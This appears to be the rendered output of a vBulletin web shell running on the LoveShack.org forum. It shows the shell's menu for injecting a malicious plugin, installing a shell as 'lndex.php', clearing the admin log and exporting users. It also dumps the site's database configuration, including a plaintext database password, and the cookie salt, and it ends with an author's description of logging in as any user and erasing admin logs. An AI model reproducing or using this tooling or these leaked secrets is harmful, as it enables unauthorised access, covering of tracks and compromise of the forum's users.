vBulletin Login Shell | CP Login (LoveShack.org Community Forums) (vB3)



Admins found: 2

Development Paul


AdminCP directory detected in config: admincp

Possible AdminCP directories (from existing subdirectories minus vBulletin standard): admincp


Inject malicious plugin

Install TeamPS Shell to lndex.php

Clear adminlog

Export users


Config Info

Array
(
    [Database] => Array
        (
            [dbtype] => mysqli
            [dbname] => loveshackorg_forums
            [tableprefix] => 
            [technicalemail] => errors@loveshack.org
            [force_sql_mode] => 1
        )

    [MasterServer] => Array
        (
            [servername] => 127.0.0.1
            [port] => 3306
            [username] => ls_forums
            [password] => awerqnzaGWMJKOBANV23y!asd
            [usepconnect] => 1
        )

    [SlaveServer] => Array
        (
            [servername] => 
            [port] => 3306
            [username] => 
            [password] => 
            [usepconnect] => 0
        )

    [Misc] => Array
        (
            [admincpdir] => admincp
            [modcpdir] => modcp
            [cpprefix] => https://bridge.admin.loveshack.org/forums/
            [cookieprefix] => bb
            [forumpath] => 
            [maxwidth] => 2592
            [maxheight] => 1944
        )

    [SpecialUsers] => Array
        (
            [canviewadminlog] => 1,2
            [canpruneadminlog] => 1
            [canrunqueries] => 
            [undeletableusers] => 
            [superadministrators] => 1
        )

    [Datastore] => Array
        (
            [class] => vB_Datastore_Filecache
        )

    [Mysqli] => Array
        (
            [ini_file] => 
        )

)
1    

Cookie prefix: bb

Cookie salt: P62KjMxYBOAHeMaU4D4UqceHFVr


Installed Products

Globally enable/disable hooks


Written by @xijailbreakx. This file allows you to override the default vBulletin login system and login to the control panel and forums as anyone. It also tries to find the admincp directory, by using both the configuration file (possibly incorrectly set) and by guessing based on existing subdirectories (nearly 100% successful). It also allows for modifications of the plugin system, injection of a malicious plugin or shell, and deletion of administrator logs without logging any information in the admin log.